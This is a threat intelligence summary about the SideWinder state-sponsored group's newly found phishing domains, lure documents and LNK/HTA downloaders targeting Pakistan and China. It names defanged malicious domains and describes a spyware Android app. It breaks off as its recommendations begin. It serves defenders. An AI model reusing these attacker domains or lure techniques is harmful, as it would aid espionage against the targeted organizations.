Cyber Security Threat Summary:
Group-IB recently uncovered a previously undocumented attack infrastructure utilized by the SideWinder, a prolific state-sponsored group, to target entities located in Pakistan and China. The infrastructure unearthed encompasses 55 domains and IP addresses which were identified by researchers as phishing domains mimicking various organizations in the news, government, telecommunications, and financial sectors.

“The newly discovered domains mimic government organizations in Pakistan, China, and India and are characterized by the use of the same values in WHOIS records and similar registration information. Hosted on some of these domains are government-themed lure documents that are designed to download an unknown next-stage payload. A majority of these documents were uploaded to VirusTotal in March 2023 from Pakistan. One among them is a Microsoft Word file purportedly from the Pakistan Navy War College (PNWC), which was analyzed by both QiAnXin and BlackBerry in recent months. Also uncovered is a Windows shortcut (LNK) file that was uploaded to VirusTotal from Beijing in late November 2022. The LNK file, for its part, is engineered to run an HTML application (HTA) file retrieved from a remote server that spoofs Tsinghua University's email system (mailtsinghua.sinacn[.]co). Another LNK file that was uploaded to VirusTotal around the same time from Kathmandu employs a similar method to fetch an HTA file from a domain masquerading as a Nepalese government website (mailv.mofs-gov[.]org)” (The Hacker News, 2023).

Security Officer Comments:
SideWinder has been in operation since at least 2012. According to researchers, the group leverages spear-phishing emails for its initial attack vector. Based on previous campaigns, the group mainly targets entities in Pakistan, China, Sria Lanka, Afghanistan, Bangladesh, Myanmar, the Philippines, Qatar, and Singapore. SideWinder’s main motive or objective seems to be cyber espionage. For instance, Group-IB uncovered a malicious Android file that was also uploaded to VirusTotal from Sri Lanka in March 2023. Taking a closer look, the researchers noted that the Android app masquerades as a “Ludo Game” and prompts users to grant the app access to device contacts, location, logs, messages, calendar and much more. With such access, the actors are able to spy on unsuspecting victims and steal sensitive information.

Suggested Correction(s):
With spear-phishing being the initial infection vector, users should adhere to the following recommendations: